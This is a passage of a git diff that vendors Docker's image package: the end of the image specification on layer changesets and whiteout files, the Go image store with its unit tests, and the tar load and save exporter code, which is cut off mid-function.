If group/gid is not specified, the + default group and supplementary groups of the given + user/uid in /etc/passwd + from the container are applied.

+
+
+ Memory integer +
+
+ Memory limit (in bytes). This acts as a default value to use + when the value is not specified when creating a container. +
+
+ MemorySwap integer +
+
+ Total memory usage (memory + swap); set to -1 to + disable swap. This acts as a default value to use when the + value is not specified when creating a container. +
+
+ CpuShares integer +
+
+ CPU shares (relative weight vs. other containers). This acts as + a default value to use when the value is not specified when + creating a container. +
+
+ ExposedPorts struct +
+
+ A set of ports to expose from a container running this image. + This JSON structure value is unusual because it is a direct + JSON serialization of the Go type + map[string]struct{} and is represented in JSON as + an object mapping its keys to an empty object. Here is an + example: + +
{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}
+ + Its keys can be in the format of: +
    +
  • + "port/tcp" +
  • +
  • + "port/udp" +
  • +
  • + "port" +
  • +
+ with the default protocol being "tcp" if not + specified. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Env array of strings +
+
+ Entries are in the format of VARNAME="var value". + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Entrypoint array of strings +
+
+ A list of arguments to use as the command to execute when the + container starts. This value acts as a default and is replaced + by an entrypoint specified when creating a container. +
+
+ Cmd array of strings +
+
+ Default arguments to the entry point of the container. These + values act as defaults and are replaced with any specified when + creating a container. If an Entrypoint value is + not specified, then the first entry of the Cmd + array should be interpreted as the executable to run. +
+
+ Volumes struct +
+
+ A set of directories which should be created as data volumes in + a container running this image. This JSON structure value is + unusual because it is a direct JSON serialization of the Go + type map[string]struct{} and is represented in + JSON as an object mapping its keys to an empty object. Here is + an example: +
{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {},
+}
+
+
+ WorkingDir string +
+
+ Sets the current working directory of the entry point process + in the container. This value acts as a default and is replaced + by a working directory specified when creating a container. +
+
+
+
+ +Any extra fields in the Image JSON struct are considered implementation +specific and should be ignored by any implementations which are unable to +interpret them. + +## Creating an Image Filesystem Changeset + +An example of creating an Image Filesystem Changeset follows. + +An image root filesystem is first created as an empty directory named with the +ID of the image being created. Here is the initial empty directory structure +for the changeset for an image with ID `c3167915dc9d` ([real IDs are much +longer](#id_desc), but this example use a truncated one here for brevity. +Implementations need not name the rootfs directory in this way but it may be +convenient for keeping record of a large number of image layers.): + +``` +c3167915dc9d/ +``` + +Files and directories are then created: + +``` +c3167915dc9d/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +The `c3167915dc9d` directory is then committed as a plain Tar archive with +entries for the following files: + +``` +etc/my-app-config +bin/my-app-binary +bin/my-app-tools +``` + +The TarSum checksum for the archive file is then computed and placed in the +JSON metadata along with the execution parameters. + +To make changes to the filesystem of this container image, create a new +directory named with a new ID, such as `f60c56784b83`, and initialize it with +a snapshot of the parent image's root filesystem, so that the directory is +identical to that of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem +can make this very efficient: + +``` +f60c56784b83/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +This example change is going add a configuration directory at `/etc/my-app.d` +which contains a default config file. There's also a change to the +`my-app-tools` binary to handle the config layout change. The `f60c56784b83` +directory then looks like this: + +``` +f60c56784b83/ + etc/ + my-app.d/ + default.cfg + bin/ + my-app-binary + my-app-tools +``` + +This reflects the removal of `/etc/my-app-config` and creation of a file and +directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been +replaced with an updated version. Before committing this directory to a +changeset, because it has a parent image, it is first compared with the +directory tree of the parent snapshot, `f60c56784b83`, looking for files and +directories that have been added, modified, or removed. The following changeset +is found: + +``` +Added: /etc/my-app.d/default.cfg +Modified: /bin/my-app-tools +Deleted: /etc/my-app-config +``` + +A Tar Archive is then created which contains *only* this changeset: The added +and modified files and directories in their entirety, and for each deleted item +an entry for an empty file at the same location but with the basename of the +deleted file or directory prefixed with `.wh.`. The filenames prefixed with +`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible +to create an image root filesystem which contains a file or directory with a +name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has +the following entries: + +``` +/etc/my-app.d/default.cfg +/bin/my-app-tools +/etc/.wh.my-app-config +``` + +Any given image is likely to be composed of several of these Image Filesystem +Changeset tar archives. + +## Combined Image JSON + Filesystem Changeset Format + +There is also a format for a single archive which contains complete information +about an image, including: + + - repository names/tags + - all image layer JSON files + - all tar archives of each layer filesystem changesets + +For example, here's what the full archive of `library/busybox` is (displayed in +`tree` format): + +``` +. +├── 5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a7b8b41220991bfc754d7ad445ad27b7f272ab8b4a2c175b9512b97471d02a8a +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a936027c5ca8bf8f517923169a233e391cbb38469a75de8383b5228dc2d26ceb +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── f60c56784b832dd990022afc120b8136ab3da9528094752ae13fe63a2d28dc8c +│   ├── VERSION +│   ├── json +│   └── layer.tar +└── repositories +``` + +There are one or more directories named with the ID for each layer in a full +image. Each of these directories contains 3 files: + + * `VERSION` - The schema version of the `json` file + * `json` - The JSON metadata for an image layer + * `layer.tar` - The Tar archive of the filesystem changeset for an image + layer. + +The content of the `VERSION` files is simply the semantic version of the JSON +metadata schema: + +``` +1.0 +``` + +And the `repositories` file is another JSON file which describes names/tags: + +``` +{ + "busybox":{ + "latest":"5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e" + } +} +``` + +Every key in this object is the name of a repository, and maps to a collection +of tag suffixes. Each tag maps to the ID of the image represented by that tag. + +## Loading an Image Filesystem Changeset + +Unpacking a bundle of image layer JSON files and their corresponding filesystem +changesets can be done using a series of steps: + +1. Follow the parent IDs of image layers to find the root ancestor (an image +with no parent ID specified). +2. For every image layer, in order from root ancestor and descending down, +extract the contents of that layer's filesystem changeset archive into a +directory which will be used as the root of a container filesystem. + + - Extract all contents of each archive. + - Walk the directory tree once more, removing any files with the prefix + `.wh.` and the corresponding file or directory named without this prefix. + + +## Implementations + +This specification is an admittedly imperfect description of an +imperfectly-understood problem. The Docker project is, in turn, an attempt to +implement this specification. Our goal and our execution toward it will evolve +over time, but our primary concern in this specification and in our +implementation is compatibility and interoperability. diff --git a/vendor/github.com/docker/docker/image/store.go b/vendor/github.com/docker/docker/image/store.go new file mode 100644 index 0000000000..b61c456097 --- /dev/null +++ b/vendor/github.com/docker/docker/image/store.go @@ -0,0 +1,295 @@ +package image + +import ( + "encoding/json" + "errors" + "fmt" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/layer" +) + +// Store is an interface for creating and accessing images +type Store interface { + Create(config []byte) (ID, error) + Get(id ID) (*Image, error) + Delete(id ID) ([]layer.Metadata, error) + Search(partialID string) (ID, error) + SetParent(id ID, parent ID) error + GetParent(id ID) (ID, error) + Children(id ID) []ID + Map() map[ID]*Image + Heads() map[ID]*Image +} + +// LayerGetReleaser is a minimal interface for getting and releasing images. +type LayerGetReleaser interface { + Get(layer.ChainID) (layer.Layer, error) + Release(layer.Layer) ([]layer.Metadata, error) +} + +type imageMeta struct { + layer layer.Layer + children map[ID]struct{} +} + +type store struct { + sync.Mutex + ls LayerGetReleaser + images map[ID]*imageMeta + fs StoreBackend + digestSet *digest.Set +} + +// NewImageStore returns new store object for given layer store +func NewImageStore(fs StoreBackend, ls LayerGetReleaser) (Store, error) { + is := &store{ + ls: ls, + images: make(map[ID]*imageMeta), + fs: fs, + digestSet: digest.NewSet(), + } + + // load all current images and retain layers + if err := is.restore(); err != nil { + return nil, err + } + + return is, nil +} + +func (is *store) restore() error { + err := is.fs.Walk(func(dgst digest.Digest) error { + img, err := is.Get(IDFromDigest(dgst)) + if err != nil { + logrus.Errorf("invalid image %v, %v", dgst, err) + return nil + } + var l layer.Layer + if chainID := img.RootFS.ChainID(); chainID != "" { + l, err = is.ls.Get(chainID) + if err != nil { + return err + } + } + if err := is.digestSet.Add(dgst); err != nil { + return err + } + + imageMeta := &imageMeta{ + layer: l, + children: make(map[ID]struct{}), + } + + is.images[IDFromDigest(dgst)] = imageMeta + + return nil + }) + if err != nil { + return err + } + + // Second pass to fill in children maps + for id := range is.images { + if parent, err := is.GetParent(id); err == nil { + if parentMeta := is.images[parent]; parentMeta != nil { + parentMeta.children[id] = struct{}{} + } + } + } + + return nil +} + +func (is *store) Create(config []byte) (ID, error) { + var img Image + err := json.Unmarshal(config, &img) + if err != nil { + return "", err + } + + // Must reject any config that references diffIDs from the history + // which aren't among the rootfs layers. + rootFSLayers := make(map[layer.DiffID]struct{}) + for _, diffID := range img.RootFS.DiffIDs { + rootFSLayers[diffID] = struct{}{} + } + + layerCounter := 0 + for _, h := range img.History { + if !h.EmptyLayer { + layerCounter++ + } + } + if layerCounter > len(img.RootFS.DiffIDs) { + return "", errors.New("too many non-empty layers in History section") + } + + dgst, err := is.fs.Set(config) + if err != nil { + return "", err + } + imageID := IDFromDigest(dgst) + + is.Lock() + defer is.Unlock() + + if _, exists := is.images[imageID]; exists { + return imageID, nil + } + + layerID := img.RootFS.ChainID() + + var l layer.Layer + if layerID != "" { + l, err = is.ls.Get(layerID) + if err != nil { + return "", err + } + } + + imageMeta := &imageMeta{ + layer: l, + children: make(map[ID]struct{}), + } + + is.images[imageID] = imageMeta + if err := is.digestSet.Add(imageID.Digest()); err != nil { + delete(is.images, imageID) + return "", err + } + + return imageID, nil +} + +func (is *store) Search(term string) (ID, error) { + is.Lock() + defer is.Unlock() + + dgst, err := is.digestSet.Lookup(term) + if err != nil { + if err == digest.ErrDigestNotFound { + err = fmt.Errorf("No such image: %s", term) + } + return "", err + } + return IDFromDigest(dgst), nil +} + +func (is *store) Get(id ID) (*Image, error) { + // todo: Check if image is in images + // todo: Detect manual insertions and start using them + config, err := is.fs.Get(id.Digest()) + if err != nil { + return nil, err + } + + img, err := NewFromJSON(config) + if err != nil { + return nil, err + } + img.computedID = id + + img.Parent, err = is.GetParent(id) + if err != nil { + img.Parent = "" + } + + return img, nil +} + +func (is *store) Delete(id ID) ([]layer.Metadata, error) { + is.Lock() + defer is.Unlock() + + imageMeta := is.images[id] + if imageMeta == nil { + return nil, fmt.Errorf("unrecognized image ID %s", id.String()) + } + for id := range imageMeta.children { + is.fs.DeleteMetadata(id.Digest(), "parent") + } + if parent, err := is.GetParent(id); err == nil && is.images[parent] != nil { + delete(is.images[parent].children, id) + } + + if err := is.digestSet.Remove(id.Digest()); err != nil { + logrus.Errorf("error removing %s from digest set: %q", id, err) + } + delete(is.images, id) + is.fs.Delete(id.Digest()) + + if imageMeta.layer != nil { + return is.ls.Release(imageMeta.layer) + } + return nil, nil +} + +func (is *store) SetParent(id, parent ID) error { + is.Lock() + defer is.Unlock() + parentMeta := is.images[parent] + if parentMeta == nil { + return fmt.Errorf("unknown parent image ID %s", parent.String()) + } + if parent, err := is.GetParent(id); err == nil && is.images[parent] != nil { + delete(is.images[parent].children, id) + } + parentMeta.children[id] = struct{}{} + return is.fs.SetMetadata(id.Digest(), "parent", []byte(parent)) +} + +func (is *store) GetParent(id ID) (ID, error) { + d, err := is.fs.GetMetadata(id.Digest(), "parent") + if err != nil { + return "", err + } + return ID(d), nil // todo: validate? +} + +func (is *store) Children(id ID) []ID { + is.Lock() + defer is.Unlock() + + return is.children(id) +} + +func (is *store) children(id ID) []ID { + var ids []ID + if is.images[id] != nil { + for id := range is.images[id].children { + ids = append(ids, id) + } + } + return ids +} + +func (is *store) Heads() map[ID]*Image { + return is.imagesMap(false) +} + +func (is *store) Map() map[ID]*Image { + return is.imagesMap(true) +} + +func (is *store) imagesMap(all bool) map[ID]*Image { + is.Lock() + defer is.Unlock() + + images := make(map[ID]*Image) + + for id := range is.images { + if !all && len(is.children(id)) > 0 { + continue + } + img, err := is.Get(id) + if err != nil { + logrus.Errorf("invalid image access: %q, error: %q", id, err) + continue + } + images[id] = img + } + return images +} diff --git a/vendor/github.com/docker/docker/image/store_test.go b/vendor/github.com/docker/docker/image/store_test.go new file mode 100644 index 0000000000..50f8aa8b84 --- /dev/null +++ b/vendor/github.com/docker/docker/image/store_test.go @@ -0,0 +1,300 @@ +package image + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/layer" +) + +func TestRestore(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + id1, err := fs.Set([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + _, err = fs.Set([]byte(`invalid`)) + if err != nil { + t.Fatal(err) + } + id2, err := fs.Set([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) + if err != nil { + t.Fatal(err) + } + err = fs.SetMetadata(id2, "parent", []byte(id1)) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { + t.Fatal(err) + } + + imgs := is.Map() + if actual, expected := len(imgs), 2; actual != expected { + t.Fatalf("invalid images length, expected 2, got %q", len(imgs)) + } + + img1, err := is.Get(ID(id1)) + if err != nil { + t.Fatal(err) + } + + if actual, expected := img1.computedID, ID(id1); actual != expected { + t.Fatalf("invalid image ID: expected %q, got %q", expected, actual) + } + + if actual, expected := img1.computedID.String(), string(id1); actual != expected { + t.Fatalf("invalid image ID string: expected %q, got %q", expected, actual) + } + + img2, err := is.Get(ID(id2)) + if err != nil { + t.Fatal(err) + } + + if actual, expected := img1.Comment, "abc"; actual != expected { + t.Fatalf("invalid comment for image1: expected %q, got %q", expected, actual) + } + + if actual, expected := img2.Comment, "def"; actual != expected { + t.Fatalf("invalid comment for image2: expected %q, got %q", expected, actual) + } + + p, err := is.GetParent(ID(id1)) + if err == nil { + t.Fatal("expected error for getting parent") + } + + p, err = is.GetParent(ID(id2)) + if err != nil { + t.Fatal(err) + } + if actual, expected := p, ID(id1); actual != expected { + t.Fatalf("invalid parent: expected %q, got %q", expected, actual) + } + + children := is.Children(ID(id1)) + if len(children) != 1 { + t.Fatalf("invalid children length: %q", len(children)) + } + if actual, expected := children[0], ID(id2); actual != expected { + t.Fatalf("invalid child for id1: expected %q, got %q", expected, actual) + } + + heads := is.Heads() + if actual, expected := len(heads), 1; actual != expected { + t.Fatalf("invalid images length: expected %q, got %q", expected, actual) + } + + sid1, err := is.Search(string(id1)[:10]) + if err != nil { + t.Fatal(err) + } + if actual, expected := sid1, ID(id1); actual != expected { + t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) + } + + sid1, err = is.Search(digest.Digest(id1).Hex()[:6]) + if err != nil { + t.Fatal(err) + } + if actual, expected := sid1, ID(id1); actual != expected { + t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) + } + + invalidPattern := digest.Digest(id1).Hex()[1:6] + _, err = is.Search(invalidPattern) + if err == nil { + t.Fatalf("expected search for %q to fail", invalidPattern) + } + +} + +func TestAddDelete(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { + t.Fatal(err) + } + + id1, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) + if err != nil { + t.Fatal(err) + } + + if actual, expected := id1, ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"); actual != expected { + t.Fatalf("create ID mismatch: expected %q, got %q", expected, actual) + } + + img, err := is.Get(id1) + if err != nil { + t.Fatal(err) + } + + if actual, expected := img.Comment, "abc"; actual != expected { + t.Fatalf("invalid comment in image: expected %q, got %q", expected, actual) + } + + id2, err := is.Create([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) + if err != nil { + t.Fatal(err) + } + + err = is.SetParent(id2, id1) + if err != nil { + t.Fatal(err) + } + + pid1, err := is.GetParent(id2) + if err != nil { + t.Fatal(err) + } + if actual, expected := pid1, id1; actual != expected { + t.Fatalf("invalid parent for image: expected %q, got %q", expected, actual) + } + + _, err = is.Delete(id1) + if err != nil { + t.Fatal(err) + } + _, err = is.Get(id1) + if err == nil { + t.Fatalf("expected get for deleted image %q to fail", id1) + } + _, err = is.Get(id2) + if err != nil { + t.Fatal(err) + } + pid1, err = is.GetParent(id2) + if err == nil { + t.Fatalf("expected parent check for image %q to fail, got %q", id2, pid1) + } + +} + +func TestSearchAfterDelete(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { + t.Fatal(err) + } + + id, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + id1, err := is.Search(string(id)[:15]) + if err != nil { + t.Fatal(err) + } + + if actual, expected := id1, id; expected != actual { + t.Fatalf("wrong id returned from search: expected %q, got %q", expected, actual) + } + + if _, err := is.Delete(id); err != nil { + t.Fatal(err) + } + + if _, err := is.Search(string(id)[:15]); err == nil { + t.Fatal("expected search after deletion to fail") + } +} + +func TestParentReset(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { + t.Fatal(err) + } + + id, err := is.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + id2, err := is.Create([]byte(`{"comment": "abc2", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + id3, err := is.Create([]byte(`{"comment": "abc3", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + if err := is.SetParent(id, id2); err != nil { + t.Fatal(err) + } + + ids := is.Children(id2) + if actual, expected := len(ids), 1; expected != actual { + t.Fatalf("wrong number of children: %d, got %d", expected, actual) + } + + if err := is.SetParent(id, id3); err != nil { + t.Fatal(err) + } + + ids = is.Children(id2) + if actual, expected := len(ids), 0; expected != actual { + t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) + } + + ids = is.Children(id3) + if actual, expected := len(ids), 1; expected != actual { + t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) + } + +} + +type mockLayerGetReleaser struct{} + +func (ls *mockLayerGetReleaser) Get(layer.ChainID) (layer.Layer, error) { + return nil, nil +} + +func (ls *mockLayerGetReleaser) Release(layer.Layer) ([]layer.Metadata, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/image/tarexport/load.go b/vendor/github.com/docker/docker/image/tarexport/load.go new file mode 100644 index 0000000000..01edd91fb7 --- /dev/null +++ b/vendor/github.com/docker/docker/image/tarexport/load.go @@ -0,0 +1,390 @@ +package tarexport + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/reference" +) + +func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { + var ( + sf = streamformatter.NewJSONStreamFormatter() + progressOutput progress.Output + ) + if !quiet { + progressOutput = sf.NewProgressOutput(outStream, false) + } + outStream = &streamformatter.StdoutFormatter{Writer: outStream, StreamFormatter: streamformatter.NewJSONStreamFormatter()} + + tmpDir, err := ioutil.TempDir("", "docker-import-") + if err != nil { + return err + } + defer os.RemoveAll(tmpDir) + + if err := chrootarchive.Untar(inTar, tmpDir, nil); err != nil { + return err + } + // read manifest, if no file then load in legacy mode + manifestPath, err := safePath(tmpDir, manifestFileName) + if err != nil { + return err + } + manifestFile, err := os.Open(manifestPath) + if err != nil { + if os.IsNotExist(err) { + return l.legacyLoad(tmpDir, outStream, progressOutput) + } + return err + } + defer manifestFile.Close() + + var manifest []manifestItem + if err := json.NewDecoder(manifestFile).Decode(&manifest); err != nil { + return err + } + + var parentLinks []parentLink + var imageIDsStr string + var imageRefCount int + + for _, m := range manifest { + configPath, err := safePath(tmpDir, m.Config) + if err != nil { + return err + } + config, err := ioutil.ReadFile(configPath) + if err != nil { + return err + } + img, err := image.NewFromJSON(config) + if err != nil { + return err + } + var rootFS image.RootFS + rootFS = *img.RootFS + rootFS.DiffIDs = nil + + if expected, actual := len(m.Layers), len(img.RootFS.DiffIDs); expected != actual { + return fmt.Errorf("invalid manifest, layers length mismatch: expected %q, got %q", expected, actual) + } + + for i, diffID := range img.RootFS.DiffIDs { + layerPath, err := safePath(tmpDir, m.Layers[i]) + if err != nil { + return err + } + r := rootFS + r.Append(diffID) + newLayer, err := l.ls.Get(r.ChainID()) + if err != nil { + newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), m.LayerSources[diffID], progressOutput) + if err != nil { + return err + } + } + defer layer.ReleaseAndLog(l.ls, newLayer) + if expected, actual := diffID, newLayer.DiffID(); expected != actual { + return fmt.Errorf("invalid diffID for layer %d: expected %q, got %q", i, expected, actual) + } + rootFS.Append(diffID) + } + + imgID, err := l.is.Create(config) + if err != nil { + return err + } + imageIDsStr += fmt.Sprintf("Loaded image ID: %s\n", imgID) + + imageRefCount = 0 + for _, repoTag := range m.RepoTags { + named, err := reference.ParseNamed(repoTag) + if err != nil { + return err + } + ref, ok := named.(reference.NamedTagged) + if !ok { + return fmt.Errorf("invalid tag %q", repoTag) + } + l.setLoadedTag(ref, imgID.Digest(), outStream) + outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", ref))) + imageRefCount++ + } + + parentLinks = append(parentLinks, parentLink{imgID, m.Parent}) + l.loggerImgEvent.LogImageEvent(imgID.String(), imgID.String(), "load") + } + + for _, p := range validatedParentLinks(parentLinks) { + if p.parentID != "" { + if err := l.setParentID(p.id, p.parentID); err != nil { + return err + } + } + } + + if imageRefCount == 0 { + outStream.Write([]byte(imageIDsStr)) + } + + return nil +} + +func (l *tarexporter) setParentID(id, parentID image.ID) error { + img, err := l.is.Get(id) + if err != nil { + return err + } + parent, err := l.is.Get(parentID) + if err != nil { + return err + } + if !checkValidParent(img, parent) { + return fmt.Errorf("image %v is not a valid parent for %v", parent.ID(), img.ID()) + } + return l.is.SetParent(id, parentID) +} + +func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) { + // We use system.OpenSequential to use sequential file access on Windows, avoiding + // depleting the standby list. On Linux, this equates to a regular os.Open. + rawTar, err := system.OpenSequential(filename) + if err != nil { + logrus.Debugf("Error reading embedded tar: %v", err) + return nil, err + } + defer rawTar.Close() + + var r io.Reader + if progressOutput != nil { + fileInfo, err := rawTar.Stat() + if err != nil { + logrus.Debugf("Error statting file: %v", err) + return nil, err + } + + r = progress.NewProgressReader(rawTar, progressOutput, fileInfo.Size(), stringid.TruncateID(id), "Loading layer") + } else { + r = rawTar + } + + inflatedLayerData, err := archive.DecompressStream(r) + if err != nil { + return nil, err + } + defer inflatedLayerData.Close() + + if ds, ok := l.ls.(layer.DescribableStore); ok { + return ds.RegisterWithDescriptor(inflatedLayerData, rootFS.ChainID(), foreignSrc) + } + return l.ls.Register(inflatedLayerData, rootFS.ChainID()) +} + +func (l *tarexporter) setLoadedTag(ref reference.NamedTagged, imgID digest.Digest, outStream io.Writer) error { + if prevID, err := l.rs.Get(ref); err == nil && prevID != imgID { + fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", ref.String(), string(prevID)) // todo: this message is wrong in case of multiple tags + } + + if err := l.rs.AddTag(ref, imgID, true); err != nil { + return err + } + return nil +} + +func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOutput progress.Output) error { + legacyLoadedMap := make(map[string]image.ID) + + dirs, err := ioutil.ReadDir(tmpDir) + if err != nil { + return err + } + + // every dir represents an image + for _, d := range dirs { + if d.IsDir() { + if err := l.legacyLoadImage(d.Name(), tmpDir, legacyLoadedMap, progressOutput); err != nil { + return err + } + } + } + + // load tags from repositories file + repositoriesPath, err := safePath(tmpDir, legacyRepositoriesFileName) + if err != nil { + return err + } + repositoriesFile, err := os.Open(repositoriesPath) + if err != nil { + return err + } + defer repositoriesFile.Close() + + repositories := make(map[string]map[string]string) + if err := json.NewDecoder(repositoriesFile).Decode(&repositories); err != nil { + return err + } + + for name, tagMap := range repositories { + for tag, oldID := range tagMap { + imgID, ok := legacyLoadedMap[oldID] + if !ok { + return fmt.Errorf("invalid target ID: %v", oldID) + } + named, err := reference.WithName(name) + if err != nil { + return err + } + ref, err := reference.WithTag(named, tag) + if err != nil { + return err + } + l.setLoadedTag(ref, imgID.Digest(), outStream) + } + } + + return nil +} + +func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[string]image.ID, progressOutput progress.Output) error { + if _, loaded := loadedMap[oldID]; loaded { + return nil + } + configPath, err := safePath(sourceDir, filepath.Join(oldID, legacyConfigFileName)) + if err != nil { + return err + } + imageJSON, err := ioutil.ReadFile(configPath) + if err != nil { + logrus.Debugf("Error reading json: %v", err) + return err + } + + var img struct{ Parent string } + if err := json.Unmarshal(imageJSON, &img); err != nil { + return err + } + + var parentID image.ID + if img.Parent != "" { + for { + var loaded bool + if parentID, loaded = loadedMap[img.Parent]; !loaded { + if err := l.legacyLoadImage(img.Parent, sourceDir, loadedMap, progressOutput); err != nil { + return err + } + } else { + break + } + } + } + + // todo: try to connect with migrate code + rootFS := image.NewRootFS() + var history []image.History + + if parentID != "" { + parentImg, err := l.is.Get(parentID) + if err != nil { + return err + } + + rootFS = parentImg.RootFS + history = parentImg.History + } + + layerPath, err := safePath(sourceDir, filepath.Join(oldID, legacyLayerFileName)) + if err != nil { + return err + } + newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, distribution.Descriptor{}, progressOutput) + if err != nil { + return err + } + rootFS.Append(newLayer.DiffID()) + + h, err := v1.HistoryFromConfig(imageJSON, false) + if err != nil { + return err + } + history = append(history, h) + + config, err := v1.MakeConfigFromV1Config(imageJSON, rootFS, history) + if err != nil { + return err + } + imgID, err := l.is.Create(config) + if err != nil { + return err + } + + metadata, err := l.ls.Release(newLayer) + layer.LogReleaseMetadata(metadata) + if err != nil { + return err + } + + if parentID != "" { + if err := l.is.SetParent(imgID, parentID); err != nil { + return err + } + } + + loadedMap[oldID] = imgID + return nil +} + +func safePath(base, path string) (string, error) { + return symlink.FollowSymlinkInScope(filepath.Join(base, path), base) +} + +type parentLink struct { + id, parentID image.ID +} + +func validatedParentLinks(pl []parentLink) (ret []parentLink) { +mainloop: + for i, p := range pl { + ret = append(ret, p) + for _, p2 := range pl { + if p2.id == p.parentID && p2.id != p.id { + continue mainloop + } + } + ret[i].parentID = "" + } + return +} + +func checkValidParent(img, parent *image.Image) bool { + if len(img.History) == 0 && len(parent.History) == 0 { + return true // having history is not mandatory + } + if len(img.History)-len(parent.History) != 1 { + return false + } + for i, h := range parent.History { + if !reflect.DeepEqual(h, img.History[i]) { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/image/tarexport/save.go b/vendor/github.com/docker/docker/image/tarexport/save.go new file mode 100644 index 0000000000..6e3a5bc589 --- /dev/null +++ b/vendor/github.com/docker/docker/image/tarexport/save.go @@ -0,0 +1,355 @@ +package tarexport + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "time" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/reference" +) + +type imageDescriptor struct { + refs []reference.NamedTagged + layers []string +} + +type saveSession struct { + *tarexporter + outDir string + images map[image.ID]*imageDescriptor + savedLayers map[string]struct{} + diffIDPaths map[layer.DiffID]string // cache every diffID blob to avoid duplicates +} + +func (l *tarexporter) Save(names []string, outStream io.Writer) error { + images, err := l.parseNames(names) + if err != nil { + return err + } + + return (&saveSession{tarexporter: l, images: images}).save(outStream) +} + +func (l *tarexporter) parseNames(names []string) (map[image.ID]*imageDescriptor, error) { + imgDescr := make(map[image.ID]*imageDescriptor) + + addAssoc := func(id image.ID, ref reference.Named) { + if _, ok := imgDescr[id]; !ok { + imgDescr[id] = &imageDescriptor{} + } + + if ref != nil { + var tagged reference.NamedTagged + if _, ok := ref.(reference.Canonical); ok { + return + } + var ok bool + if tagged, ok = ref.(reference.NamedTagged); !ok { + var err error + if tagged, err = 